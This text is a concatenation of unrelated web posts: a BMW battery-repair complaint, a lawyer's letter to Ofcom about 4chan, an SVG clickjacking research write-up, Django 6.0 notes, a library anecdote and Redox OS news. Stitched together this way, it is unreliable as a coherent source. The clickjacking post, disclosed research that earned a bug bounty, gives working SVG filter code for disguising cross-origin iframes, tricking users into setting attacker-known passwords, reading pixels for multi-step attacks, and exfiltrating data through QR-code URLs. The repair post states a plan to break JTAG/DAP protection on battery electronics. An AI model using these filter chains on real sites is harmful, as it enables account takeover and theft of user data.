The next problem: BMW refuses to provide training access for ISTA usage. We submitted two official certification requests — both were rejected by the central office in Austria, which is borderline discriminatory.
One more next problem: Battery erasal can happen in OEM and can happen in our or any other 3rd party workshop, but if procedure was started in workshop 1, it cant be continued in workshop 2. If battery damage happens in our workshop during fuse change, and than battery swap needed, we or even OEM workshop do not cover costs of completely new battery pack. Which increases heavily ownership costs.
All of this represents unnecessary complexity with no meaningful purpose.
While Tesla’s pyrofuse costs €11 and the BMS reset is around 50€, allowing the car to be safely restored, BMW’s approach borders on illogical engineering, with no benefit to safety, no benefit to anti-theft protection — the only outcome is the generation of billable labour hours and massive amounts of needless electronic/lithium waste.
Beyond that, we are actively working on breaking the JTAG/DAP protection to gain direct access to the D-Flash data and decrypt its contents together with our colleagues from Hungary. The goal is to simplify the entire battery-recovery procedure, reduce costs, and actually deliver the CO₂ reduction that the EU keeps missleading— since the manufacturers clearly won’t.
Part number: 61 27 8 880 208
Faults: 21F2A8 High voltage battery unit, terminal
High voltage battery safety: capsule Defective trigger/control electronics
21F35B high voltage battery unit,
voltage and electric current sensor, current: Counter for the reuse of cell modules exceeded (safety function)
21F393 High voltage battery unit, fault
cumulative: Memory of faults that prevent the
active transport
3B001D High voltage battery unit,
contactor excitation controller circuit breakers: Double fault
21F37E Collision Detection: Collision
detected due to ACSM signal
21F04B High voltage battery unit,
Safety function: Reset command units executed
OEM Service cost: 4000€+tax (aprox – if you have bmw quote, send)
OEM iBMUCP : 1100€+tax
Labor hours: 24h – 50h
EVC: 2500€+tax (full service)
**It is cheaper to change LG Battery on Tesla, than changing fuse on BMW PHEV, and probably even less CO2 footpring
If you want to book your service with EV CLINIC:
Zagreb 1: www.evclinic.hr
Berlin: www.evclinic.de
Slovenija: www.evclinic.si
Serbia: www.evclinic.rs
This is a continuation of the Ofcom Files, a series of First Amendment-protected public disclosures designed to inform the American and British public about correspondence that the UK’s censorship agency, Ofcom, should prefer to keep secret. See Part 1 , Part 2 , and Part 3 .
We heard from Ofcom again today.
The agency writes:
The full letter Ofcom attached to their e-mail was full of legally illiterate nonsense claiming extraterritorial power to enforce their censorship laws against Americans in the United States.
Bryan Lunduke highlighted the key bits over on X. The full letter is at the bottom of this post.
— The Lunduke Journal (@LundukeJournal) December 4, 2025The United Kingdom’s Ofcom has sent yet another threatening letter to 4chan (a US company).
After 4chan refused to pay fines to a foreign government, the United Kingdom says they are “expanding the scope of the investigation into 4chan”.
UK’s Ofcom states that United Kingdom… pic.twitter.com/nNhhCmHKsa
We replied as follows:
—
Sirs,
Last night Sarah Rogers, the United States Under Secretary of State for Public Diplomacy, let it be known on GB News , in London, that the United States Congress is considering introducing a federal version of the GRANITE Act.
The GRANITE Act , at state level, is a foreign censorship shield law reform proposal I threw together exactly 51 days ago on my personal blog. Colin Crossman, Wyoming’s Deputy Secretary of State, turned it into a bill . Now, it seems, very dedicated staffers in Congress and our principled elected representatives are keen to make it a federal law.
The proposal was inspired by your agency’s censorship letters, letters targeting Amercians in America for conduct occurring wholly and exclusively in America, letters just like this one and the dozen others you’ve sent to my countrymen over the last eleven months.
It was also inspired by the passive-aggressive phone call I had with officials from your Home Office in 2023 asking me how my clients would implement your rules because, according to them, my clients’ users would demand that they comply (as far as I am aware, of my clients’ tens of millions of users among their various websites, not a single one has asked to be censored by the British). I replied that if your country wanted to censor my clients, the British Army would need to commence a ground invasion of the United States and seize their servers by force. That answer remains unchanged.
4chan is a website where users are free to remain anonymous. Your “age assurance” rules would destroy anonymity online, which is protected by the First Amendment. Accordingly, 4chan will not be implementing your “age assurance” rules.
Prompt and voluntary cooperation with law enforcement on child safety issues, including UK law enforcement, is what really matters for children’s safety online. That work happens quietly and non-publicly with officials who are tasked with performing it, namely, the police. My client will not be working with you on that important work because your agency is a censorship agency, not a law enforcement agency. Ofcom lacks the competence and the jurisdiction to do the work that actually matters in this space.
Regardless of whether GRANITE makes it on the books or not, and I will do everything in my personal power to ensure that it does, my clients don’t answer to you, 4chan included, because of the First Amendment. But then, Ofcom already knew that.
I copy the U.S. government and government officials in several states. My client reserves all rights.
Preston Byrne
—
Pretty sure my invitation to Number 10’s Christmas party is going to get lost in the post this year.
There is a possible future, in the very near future, where these notices will be utterly impossible for foreign governments to send to American citizens – notices I have been parrying, professionally, for eight years.
America needs to protect her builders from this foreign overreach. I am extremely hopeful that the U.S. Congress and the White House will seal the deal and secure the American-led future of the Internet for decades to come. We’re not there yet, but we’re close.
Clickjacking is a classic attack that consists of covering up an iframe of some other website in an attempt to trick the user into unintentionally interacting with it. It works great if you need to trick someone into pressing a button or two, but for anything more complicated it’s kind of unrealistic.
I’ve discovered a new technique that turns classic clickjacking on its head and enables the creation of complex interactive clickjacking attacks, as well as multiple forms of data exfiltration.
I call this technique “ SVG clickjacking ”.
The day Apple announced its new Liquid Glass redesign was pretty chaotic. You couldn’t go on social media without every other post being about the new design, whether it was critique over how inaccessible it seemed, or awe at how realistic the refraction effects were.
Drowning in the flurry of posts, a thought came to mind - how hard would it be to re-create this effect? Could I do this, on the web, without resorting to canvas and shaders? I got to work, and about an hour later I had a pretty accurate CSS/SVG recreation of the effect 1 .
EMERGENCY!
Girls Rituals
This Won't Be The Last Time
acloudyskye
SOUND BANDIT FUCKING LIVES
Sound Bandit
Love & Ponystep
Vylet Pony
I Love My Computer
Ninajirachi
You can drag around the effect with the bottom-right circle control thing in the demo above (chrome/firefox desktop, chrome mobile).
Note: This demo is broken in Safari, sorry.
My little tech demo made quite a splash online, and even resulted in a news article with what is probably the wildest quote about me to date: “Samsung and others have nothing on her” .
A few days passed, and another thought came to mind - would this SVG effect work on top of an iframe?
Like, surely not? The way the effect “refracts light” 2 is way too complex to work on a cross-origin document.
But, to my surprise, it did.
The reason this was so interesting to me is that my liquid glass effect uses the
feColorMatrix
and
feDisplacementMap
SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document?
This got me wondering - do any of the other filters work on iframes, and could we turn that into an attack somehow? It turns out that it’s all of them, and yes!
I got to work, going through every <fe*> SVG element and figuring out which ones can be combined to build our own attack primitives.
These filter elements take in one or more input images, apply operations to them, and output a new image. You can chain a bunch of them together within a single SVG filter, and refer to the output of any of the previous filter elements in the chain.
Let’s take a look at some of the more useful base elements we can play with:
That’s quite a selection of utilities!
If you’re a demoscener 3 you’re probably feeling right at home. These are the fundamental building blocks for many kinds of computer graphics, and they can be combined into many useful primitives of our own. So let’s see some examples.
I’ll start off with an example of basic data exfiltration. Suppose you’re targeting an iframe that contains some sort of sensitive code. You could ask the user to retype it by itself, but that’d probably seem suspicious.
What we can do instead is make use of
feDisplacementMap
to make the text seem like a captcha! This way, the user is far more likely to retype the code.
Here is your secret code:
6c79 7261 706f 6e79
Don't share it with anyone!
Here is your secret code:
6c79 7261 706f 6e79
Don't share it with anyone!
Complete a captcha
What's written above?
Good girl!!
( tap click to edit if you're not a girl)
<iframe src = "..." style = "filter:url(#captchaFilter)" ></iframe>
<svg width = "768" height = "768" viewBox = "0 0 768 768" xmlns = "http://www.w3.org/2000/svg" >
<filter id = "captchaFilter" >
<feTurbulence
type = "turbulence"
baseFrequency = "0.03"
numOctaves = "4"
result = "turbulence" />
<feDisplacementMap
in = "SourceGraphic"
in2 = "turbulence"
scale = "6"
xChannelSelector = "R"
yChannelSelector = "G" />
</filter>
</svg>
Note: Only the part inside the
<filter>
block is relevant, the rest is just an example of using filters.
Add to this some color effects and random lines , and you’ve got a pretty convincing cap - tcha!
Out of all the attack primitives I’ll be sharing, this one is probably the least useful as sites rarely allow you to frame pages giving out magic secret codes. I wanted to show it though, as it’s a pretty simple introduction to the attack technique.
Still, it could come in handy because often times you’re allowed to frame read-only API endpoints, so maybe there’s an attack there to discover.
The next example is for situations where you want to trick someone into, for example, interacting with a text input. Oftentimes the inputs have stuff like grey placeholder text in them, so showing the input box by itself won’t cut it.
Let’s take a look at our example target (try typing in the box).
Set a new password
too short
In this example we want to trick the user into setting an attacker-known password, so we want them to be able to see the text they’re entering, but not the grey placeholder text, nor the red “too short” text.
Let’s start off by using
feComposite
with arithmetics to make the grey text disappear. The
arithmetic
operation takes in two images,
i1
(
in=...
) and
i2
(
in2=...
), and lets us do per-pixel maths with
k1
,
k2
,
k3
,
k4
as the arguments according to this formula:
4
.
Set a new password
too short
<feComposite operator = arithmetic
k1 = 0 k2 = 4 k3 = 0 k4 = 0 />
Tip! You can leave out the in/in2 parameters if you just want it to be the previous output.
It’s getting there - by multiplying the brightness of the input we’ve made the grey text disappear, but now the black text looks a little suspicious and hard to read, especially on 1x scaling displays.
We could play around with the arguments to find the perfect balance between hiding the grey text and showing the black one, but ideally we’d still have the black text look the way usually does, just without any grey text. Is that possible?
So here’s where a really cool technique comes into play - masking. We’re going to create a matte to “cut out” the black text and cover up everything else. It’s going to take us quite a few steps to get to the desired result, so lets go through it bit-by-bit.
We start off by cropping the result of our black text filter with
feTile
.
Set a new password
too short
<feTile x = 20 y = 56 width = 184 height = 22 />
Note: Safari seems to be having some trouble with
feTile
, so if
the examples flicker or look blank, read this post in a browser such as Firefox or Chrome. If
you're writing an attack for Safari, you can also achieve cropping by making a luma matte with
feFlood
and then applying it.
Then we use
feMorphology
to increase the thickness of the text.
Set a new password
too short
<feMorphology operator = erode radius = 3 result = thick />
Now we have to increase the contrast of the mask. I’m going to do it by first using
feFlood
to create a solid white image, which we can then
feBlend
with
difference
to invert our mask. And then we can use
feComposite
to multiply
5
the mask for better contrast.
Set a new password
too short
<feFlood flood-color = #FFF result = white />
<feBlend mode = difference in = thick in2 = white />
<feComposite operator = arithmetic k2 = 100 />
We have a luma matte now! All that’s left is to convert it into an alpha matte with
feColorMatrix
, apply it to the source image with
feComposite
, and make the background white with
feBlend
.
Set a new password
too short
<feColorMatrix type = matrix
values = "0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" />
<feComposite in = SourceGraphic operator = in />
<feBlend in2 = white />
Looks pretty good, doesn’t it! If you empty out the box (try it!) you might notice some artifacts that give away what we’ve done, but apart from that it’s a pretty good way to sort of sculpt and form various inputs around a bit for an attack.
There are all sorts of other effects you can add to make the input seem just right. Let’s combine everything together into a complete example of an attack.
Set a new password
too short
Enter your e-mail address:
<filter>
<feComposite operator = arithmetic
k1 = 0 k2 = 4 k3 = 0 k4 = 0 />
<feTile x = 20 y = 56 width = 184 height = 22 />
<feMorphology operator = erode radius = 3 result = thick />
<feFlood flood-color = #FFF result = white />
<feBlend mode = difference in = thick in2 = white />
<feComposite operator = arithmetic k2 = 100 />
<feColorMatrix type = matrix
values = "0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" />
<feComposite in = SourceGraphic operator = in />
<feTile x = 21 y = 57 width = 182 height = 20 />
<feBlend in2 = white />
<feBlend mode = difference in2 = white />
<feComposite operator = arithmetic k2 = 1 k4 = 0.02 />
</filter>
You can see how the textbox is entirely recontextualized now to fit a different design while still being fully functional.
And now we come to what is most likely the most useful attack primitive - pixel reading. That’s right, you can use SVG filters to read color data off of images and perform all sorts of logic on them to create really advanced and convincing attacks.
The catch is of course, that you’ll have to do everything within SVG filters - there is no way to get the data out 6 . Despite that, it is very powerful if you get creative with it.
On a higher level, what this lets us do is make everything in a clickjacking attack responsive - fake buttons can have hover effects, pressing them can show fake dropdowns and dialogs, and we can even have fake form validation.
Let’s start off with a simple example - detecting if a pixel is pure black, and using it to turn another filter on or off.
<--- very cool! click to change color
For this target, we want to detect when the user clicks on the box to change its color, and use that to toggle a blur effect.
All the examples from here onwards are broken on Safari. Use Firefox or Chrome if you don't see them.
<--- very cool! click to change color
<feTile x = "50" y = "50"
width = "4" height = "4" />
<feTile x = "0" y = "0"
width = "100%" height = "100%" />
Let’s start off by using two copies of the
feTile
filter to first crop out the few pixels we’re interested in and then tile those pixels across the entire image.
The result is that we now have the entire screen filled with the color of the area we are interested in.
<--- very cool! click to change color
<feComposite operator = arithmetic k2 = 100 />
We can turn this result into a binary on/off value by using
feComposite
’s arithmetic the same way as in the last section, but with a way larger
k2
value. This makes it so that the output image is either completely black or completely white.
<--- very cool! click to change color
<feColorMatrix type = matrix
values = "0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" result = mask />
<feGaussianBlur in = SourceGraphic
stdDeviation = 3 />
<feComposite operator = in in2 = mask />
<feBlend in2 = SourceGraphic />
And just as before, this can be used as a mask. We once again convert it into an alpha matte, but this time apply it to the blur filter.
So that’s how you can find out whether a pixel is black and use that to toggle a filter!
<--- very cool! click to change color
Uh oh! It seems that somebody has changed the target to have a pride-themed button instead!
How can we adapt this technique to work with arbitrary colors and textures?
<--- very cool! click to change color
<!-- crop to first stripe of the flag -->
<feTile x = "22" y = "22"
width = "4" height = "4" />
<feTile x = "0" y = "0" result = "col"
width = "100%" height = "100%" />
<!-- generate a color to diff against -->
<feFlood flood-color = "#5BCFFA"
result = "blue" />
<feBlend mode = "difference"
in = "col" in2 = "blue" />
<!-- k4 is for more lenient threshold -->
<feComposite operator = arithmetic
k2 = 100 k4 = -5 />
<!-- do the masking and blur stuff... -->
...
The solution is pretty simple - we can simply use
feBlend
’s difference combined with a
feColorMatrix
to join the color channels to turn the image into a similar black/white matte as before. For textures we can use
feImage
, and for non-exact colors we can use a bit of
feComposite
’s arithmetic to make the matching threshold more lenient.
And that’s it, a simple example of how we can read a pixel value and use it to toggle a filter.
But here’s the part where it gets fun! We can repeat the pixel-reading process to read out multiple pixels, and then run logic on them to program an attack.
By using
feBlend
and
feComposite
, we can recreate all logic gates and make SVG filters
functionally complete
. This means that we can program anything we want, as long as it is not timing-based
7
and doesn’t take up too many resources
8
.
Input:
NOT:
<feBlend mode=difference in2=white />
AND:
<feComposite operator=arithmetic k1=1 />
OR:
<feComposite operator=arithmetic k2=1 k3=1 />
XOR:
<feBlend mode=difference in=a in2=b />
NAND:
(AND + NOT)
NOR:
(OR + NOT)
XNOR:
(XOR + NOT)
These logic gates are what modern computers are made of. You could build a computer within an SVG filter if you wanted to. In fact, here’s a basic calculator I made:
This is a full adder circuit. This filter implements the logic gates for the output and for the carry bit using the logic gates described above. There are more efficient ways to implement an adder in SVG filters, but this is meant to serve as proof of the ability to implement arbitrary logic circuits.
<!-- util -->
<feOffset in = "SourceGraphic" dx = "0" dy = "0" result = src />
<feTile x = "16px" y = "16px" width = "4" height = "4" in = src />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = a />
<feTile x = "48px" y = "16px" width = "4" height = "4" in = src />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = b />
<feTile x = "72px" y = "16px" width = "4" height = "4" in = src />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = c />
<feFlood flood-color = #FFF result = white />
<!-- A ⊕ B -->
<feBlend mode = difference in = a in2 = b result = ab />
<!-- [A ⊕ B] ⊕ C -->
<feBlend mode = difference in2 = c />
<!-- Save result to 'out' -->
<feTile x = "96px" y = "0px" width = "32" height = "32" result = out />
<!-- C ∧ [A ⊕ B] -->
<feComposite operator = arithmetic k1 = 1 in = ab in2 = c result = abc />
<!-- (A ∧ B) -->
<feComposite operator = arithmetic k1 = 1 in = a in2 = b />
<!-- [A ∧ B] ∨ [C ∧ (A ⊕ B)] -->
<feComposite operator = arithmetic k2 = 1 k3 = 1 in2 = abc />
<!-- Save result to 'carry' -->
<feTile x = "64px" y = "32px" width = "32" height = "32" result = carry />
<!-- Combine results -->
<feBlend in2 = out />
<feBlend in2 = src result = done />
<!-- Shift first row to last -->
<feTile x = "0" y = "0" width = "100%" height = "32" />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = lastrow />
<feOffset dx = "0" dy = "-32" in = done />
<feBlend in2 = lastrow />
<!-- Crop to output -->
<feTile x = "0" y = "0" width = "100%" height = "100%" />
Anyways, for an attacker, what all of this means is that you can make a multi-step clickjacking attack with lots of conditions and interactivity. And you can run logic on data from cross-origin frames.
Securify
Welcome to this secure application!
This is an example target where we want to trick the user into marking themselves as hacked, which requires a few steps:
Securify
Welcome to this secure application!
Win free iPod by following the steps below.
1. Click here
2. Wait 3 seconds
3. Click
4. Click here
A traditional clickjacking attack against this target would be difficult to pull off. You’d need to have the user click on multiple buttons in a row with no feedback in the UI.
There are some tricks you could do to make a traditional attack more convincing than what you see above, but it’s still gonna look sketch af. And the moment you throw something like a text input into the mix, it’s just not gonna work.
Anyways, let’s build out a logic tree for a filter-based attack:
Which can be expressed in logic gates 9 as:
feMorphology
and check for red pixels
And this is how we would implement it in SVG:
<!-- util -->
<feTile x = "14px" y = "4px" width = "4" height = "4" in = SourceGraphic />
<feTile x = "0" y = "0" width = "100%" height = "100%" />
<feColorMatrix type = matrix result = debugEnabled
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feFlood flood-color = #FFF result = white />
<!-- attack imgs -->
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = button1.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = loading.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = checkbox.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = button2.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = end.png ></feImage>
<!-- D (dialog visible) -->
<feTile x = "4px" y = "4px" width = "4" height = "4" in = SourceGraphic />
<feTile x = "0" y = "0" width = "100%" height = "100%" />
<feBlend mode = difference in2 = white />
<feComposite operator = arithmetic k2 = 100 k4 = -1 result = D />
<!-- L (dialog loaded) -->
<feTile x = "313px" y = "141px" width = "4" height = "4" in = SourceGraphic />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = "dialogBtn" />
<feBlend mode = difference in2 = white />
<feComposite operator = arithmetic k2 = 100 k4 = -1 result = L />
<!-- C (checkbox checked) -->
<feFlood flood-color = #0B57D0 />
<feBlend mode = difference in = dialogBtn />
<feComposite operator = arithmetic k2 = 4 k4 = -1 />
<feComposite operator = arithmetic k2 = 100 k4 = -1 />
<feColorMatrix type = matrix
values = "1 1 1 0 0
1 1 1 0 0
1 1 1 0 0
1 1 1 1 0" />
<feBlend mode = difference in2 = white result = C />
<!-- R (red text visible) -->
<feMorphology operator = erode radius = 3 in = SourceGraphic />
<feTile x = "17px" y = "150px" width = "4" height = "4" />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = redtext />
<feColorMatrix type = matrix
values = "0 0 1 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" />
<feComposite operator = arithmetic k2 = 2 k3 = -5 in = redtext />
<feColorMatrix type = matrix result = R
values = "1 0 0 0 0
1 0 0 0 0
1 0 0 0 0
1 0 0 0 1" />
<!-- Attack overlays -->
<feColorMatrix type = matrix in = R
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = end.png operator = in />
<feBlend in2 = button1.png />
<feBlend in2 = SourceGraphic result = out />
<feColorMatrix type = matrix in = C
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = button2.png operator = in />
<feBlend in2 = checkbox.png result = loadedGraphic />
<feColorMatrix type = matrix in = L
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = loadedGraphic operator = in />
<feBlend in2 = loading.png result = dialogGraphic />
<feColorMatrix type = matrix in = D
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = dialogGraphic operator = in />
<feBlend in2 = out />
Securify
Welcome to this secure application!
Play around with this and see just how much more convincing it is as an attack. And we could easily make it better by, for example, adding some extra logic to also add hover visuals to the buttons. The demo has debug visuals for the four inputs (D, L, C, R) in the bottom left as squares to make it easier to understand what’s going on.
But yeah, that’s how you can make complex and long clickjacking attacks that have not been realistic with the traditional clickjacking methods.
I kept this example here pretty short and simple, but real-world attacks can be a lot more involved and polished.
In fact…
I’ve actually managed to pull off this attack against Google Docs!
Take a look at the demo videos here (alt links: bsky , twitter ).
What this attack does is:
In the past, individual parts of such an attack could’ve been pulled off through traditional clickjacking and some basic CSS, but the entire attack would’ve been way too long and complex to be realistic. With this new technique of running logic inside SVG filters, such attacks become realistic.
Google VRP awarded me $3133.70 for the find. That was, of course, right before they introduced a novelty bonus for new vulnerability classes. Hmph! 10
Something I see in online discussions often is the insistence on QR codes being dangerous. It kind of rubs me the wrong way because QR codes are not any more dangerous than links.
I don’t usually comment on this too much because it’s best to avoid suspicious links, and the same goes for QR codes, but it does nag me to see people make QR codes out to be this evil thing that can somehow immediately hack you.
I turns out though, that my SVG filters attack technique can be applied to QR codes as well!
The example from earlier in the blog with retyping a code becomes impractical once the user realizes they’re typing something they shouldn’t. We can’t stuff the data we exfiltrate into a link either, because an SVG filter cannot create a link.
But since an SVG filter can run logic and provide visual output, perhaps we could generate a QR code with a link instead?
Creating a QR code within an SVG filter is easier said than done however. We can shape binary data into the shape of a QR code by using
feDisplacementMap
, but for a QR code to be scannable it also needs error correction data.
QR codes use Reed-Solomon error correction , which is some fun math stuff that’s a bit more advanced than a simple checksum. It does math with polynomials and stuff and that is a bit annoying to reimplement in an SVG.
Luckily for us, I’ve faced the same problem before! Back in 2021 I was the first person 11 to make a QR code generator in Minecraft , so I’ve already figured out the things necessary.
In my build I pre-calculated some lookup tables for the error correction, and used those instead to make the build simpler - and we can do the same with the SVG filter.
This post is already getting pretty long, so I’ll leave figuring out how this filter works as an exercise to the reader ;).
Hover to see QR
This is a demo that displays a QR code telling you how many seconds you’ve been on this page for. It’s a bit fiddly, so if it doesn’t work make sure that you aren’t using any
This demo
Similarly, in a real attack, the scaling and color profile issues could be worked around using some JavaScript tricks or simply by implementing the filter a bit differently - this here is just a proof of concept that’s a bit rough around the edges.
But yeah, that’s a QR code generator built inside an SVG filter!
Took me a while to make, but I didn’t want to write about it just being “theoretically possible”.
So the attack scenario with the QR code is that you’d read pixels from a frame, process them to extract the data you want, encode them into a URL that looks something like https://lyra. horse /?ref=c3VwZXIgc2VjcmV0IGluZm8 and render it as a QR code.
Then, you prompt the user to scan the QR code for whatever reason (eg anti-bot check). To them, the URL will seem like just a normal URL with a tracking ID or something in it.
Once the user opens the URL, your server gets the request and receives the data from the URL.
There are so many ways to make use of this technique I won’t have time to go over them all in this post. Some examples would be reading text by using the difference blend mode, or exfiltrating data by making the user click on certain parts of the screen.
You could even insert data from the outside to have a fake mouse cursor inside the SVG that shows the pointer cursor and reacts to fake buttons inside your SVG to make the exfiltration more realistic.
Or you could code up attacks with CSS and SVG where CSP doesn’t allow for any JS.
Anyways, this post is long as is, so I’ll leave figuring out these techniques as homework.
This is the first time in my security research I’ve found a completely new technique!
I introduced it briefly at my BSides talk in September , and this post here is a more in-depth overview of the technique and how it can be used.
Of course, you can never know 100% for sure that a specific type of attack has never been found by anyone else, but my extensive search of existing security research has come up with nothing, so I suppose I can crown myself as the researcher who discovered it?
Here’s some previous research I’ve found:
I don’t think me discovering this technique was just luck though. I have a history of seeing things such as CSS as programming languages to exploit and be creative with. It wasn’t a stretch for me to see SVG filters as a programming language either.
That, and my overlap between security research and creative projects - I often blur the lines between the two, which is what Antonymph was born out of.
In any case,
whoa this post took such a long time for me to get done!
i started work on it in july, and was expecting to release it alongside my CSS talk in september, but it has taken me so much longer than expected to actually finish this thing. i wanted to make sure it was a good in-depth post, rather than something i just get out as soon as possible.
unlike my previous posts, i did unfortunately have to break my trend of using no images, since i needed a few data URIs within the SVG filters for demos. still, no images anywhere else in the post, no javascript, and just 42kB (gzip) of handcrafted html/css/svg.
also, i usually hide a bunch of easter eggs in my post that link to stuff i’ve enjoyed recently, but i have a couple links i didn’t want to include without content warnings. finding responsibility is a pretty dark talk about the ethics of making sure your work won’t end up killing people, and youre the one ive always wanted is slightly nsfw doggyhell vent art.
btw i’ll soon be giving talks at 39c3 and disobey 2026 ! the 39c3 one is titled “ css clicker training ” and will be about css crimes and making games in css. and the disobey one is the same talk as the bsides one about using css to hack stuff and get bug bounties, but i’ll make sure to throw some extra content in there to keep it fun.
see y’all around!!
<3
Note: I you’re making content (articles, videos etc) based on this post, feel free to reach out to me to ask for questions or feedback.
Django 6.0 released . Django 6.0 includes a flurry of neat features , but the two that most caught my eye are background workers and template partials .
Background workers started out as DEP (Django Enhancement Proposal) 14 , proposed and shepherded by Jake Howard. Jake prototyped the feature in django-tasks and wrote this extensive background on the feature when it landed in core just in time for the 6.0 feature freeze back in September.
Kevin Wetzels published a useful first look at Django's background tasks based on the earlier RC, including notes on building a custom database-backed worker implementation.
Template Partials
were implemented as a Google Summer of Code project by Farhan Ali Raza. I really like the design of this. Here's an example from
the documentation
showing the neat
inline
attribute which lets you both use and define a partial at the same time:
{# Define and render immediately. #} {% partialdef user-info inline %} <div id="user-info-{{ user.username }}"> <h3>{{ user.name }}</h3> <p>{{ user.bio }}</p> </div> {% endpartialdef %} {# Other page content here. #} {# Reuse later elsewhere in the template. #} <section class="featured-authors"> <h2>Featured Authors</h2> {% for user in featured %} {% partial user-info %} {% endfor %} </section>
You can also render just a named partial from a template directly in Python code like this:
return render(request, "authors.html#user-info", {"user": user})
I'm looking forward to trying this out in combination with HTMX .
I asked Claude Code to dig around in my blog's source code looking for places that could benefit from a template partial. Here's the resulting commit that uses them to de-duplicate the display of dates and tags from pages that list multiple types of content, such as my tag pages .
I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.
I recently wrote about Coutellerie Nontronnaise on my Niche Museums website, a historic knife manufactory in Nontron, France. They had a certificate on the wall claiming that they had previously held a Guinness World Record for the smallest folding knife, but I had been unable to track down any supporting evidence.
I posed this as a text message challenge to the librarians, and they tracked down the exact page from the 1989 "Le livre guinness des records" describing the record!
Le plus petit
Les établissements Nontronnaise ont réalisé un couteau de 10 mm de long, pour le Festival d’Aubigny, Vendée, qui s’est déroulé du 4 au 5 juillet 1987.
Thank you, Maria at the CSM library.
Redox OS is a complete Unix-like general-purpose microkernel-based operating system written in Rust. November was a very exciting month for Redox! Here’s all the latest news.
If you would like to support Redox, please consider donating or buying some merch!
Jeremy Soller successfully ported the Smallvil Wayland compositor example from the Smithay framework and GTK3 Wayland to Redox. Special thanks to Ibuki Omatsu (Unix Domain Socket implementation and bug fixing), Wildan Mubarok (bug fixing and implementation of missing functions), and other contributors for making it possible. Smallvil performance on Redox is not adequate, so we still have work to do on Wayland support, but this represents a huge step forward.
Jeremy Soller and Wildan Mubarok successfully ported and fixed WebKitGTK (GTK 3.x frontend) and its web browser example on Redox. Thanks again to other contributors which helped us to achieve this.
This is first full-featured browser engine ported to Redox, allowing most websites to work.
Jeremy Soller was porting MATE Marco for a better X11 window manager and decided to port a basic MATE desktop.
Jeremy Soller added and fixed many driver timeouts to block more infinite loop bugs and continue booting, he also updated system components and drivers to deamonize after starting and moved the hardware initialization to their child process to fix hangs and allow the boot to continue in more hardware.
If you have a computer that hangs on Redox boot we recommend that you test again with the latest daily image.
The Rust upstream migrated the i686 CPU targets to i586. The Redox build system and documentation have been updated to use
i586
as the CPU architecture target name for 32-bit x86 computers.
Jeremy Soller and Wildan Mubarok implemented a feature to allow recipes to configure what build tools they need, and these build tools being available as recipes. It will allow the following benefits:
Jeremy Soller unified the build system repositories, merging the submodules into the main build system repository . This will help to simplify build system improvements, keep everything synchronized, and allow faster development and testing.
If you haven’t updated your build system yet, you should backup your changes,
and either run the
make distclean pull container_clean all
command, or download a new build system copy (
git clone https://gitlab.redox-os.org/redox-os/redox.git
)
and build from scratch.
After suffering frequent GitLab slowdowns, we discovered that bots were using our CI for cryptomining (again) and AI scrapers were consuming the server resources making it very slow. As a consequence, we increased our protection, which changed some things:
git push
usage.
The book has been updated with instructions on how to configure your PAT .
kfpath
in some schemes
F_DUPFD_CLOEXEC
kfpath
on DTB scheme
alxd
,
ihdad
,
ac97d
, and
sb16d
drivers to use the
redox-scheme
library, which makes them up-to-date
drivers
repository into the
base
repository. It will allow faster development and testing, especially for driver initialization, and simplify configuration.
MSG_DONTWAIT
in Unix Domain Sockets
SO_PEERCRED
in Unix streams
fpath()
function in the
proc
scheme
fstat()
function in the IPC daemon
fevent()
function handling
SO_SNDBUF
in IPC daemon
minimal
variants
sys/queue.h
function group
ppoll()
function
ai_addrlen
and
socklen_t
type definitions
posix_fallocate()
function
getpeername()
function in Unix Streams
getsubopt()
function
fpath()
function to use the new scheme format
orbclient
example
orbclient
library gradient calculation
librsvg
compilation
FSTOOLS_IN_PODMAN
environment variable) to build and run the filesystem tools in the Podman container, it fixes a problem with FUSE on MacOS, NixOS and GuixSD
REPO_BINARY
option to cache downloaded packages between image rebuilds
uc.recipe
recipe target
REPO_OFFLINE
(offline mode) environment variable
make cook
(Build the filesystem enabled recipes),
make push
(only install recipe packages with changes in an existing QEMU image),
make tree
(show the filesystem configuration recipes and recipe dependencies tree
),
make find
(show recipe packages location), and
make mount_live
(mount the live disk ISO) commands
make x.--all
(run a recipe option in all recipes) and
make x.--category-category-name
(run a recipe option in a recipe category folder) commands
source.shallow_clone
data type (to enable Git shallow clone in recipes)
CI
(disable parallel recipe fetch/build and Cookbook TUI),
COOKBOOK_MAKE_JOBS
(set the number of CPU threads for recipe compilation),
COOKBOOK_VERBOSE
(enable more recipe log information) and
COOKBOOK_LOGS
(option to save recipe logs at
build/logs/$TARGET
) environment variables
To test the changes of this month download the
server
or
desktop
variants of the
daily images
.
Use the
desktop
variant for a graphical interface. If you prefer a terminal-style interface, or if the
desktop
variant doesn’t work, please try the
server
variant.
Read the following pages to learn how to use the images in a virtual machine or real hardware:
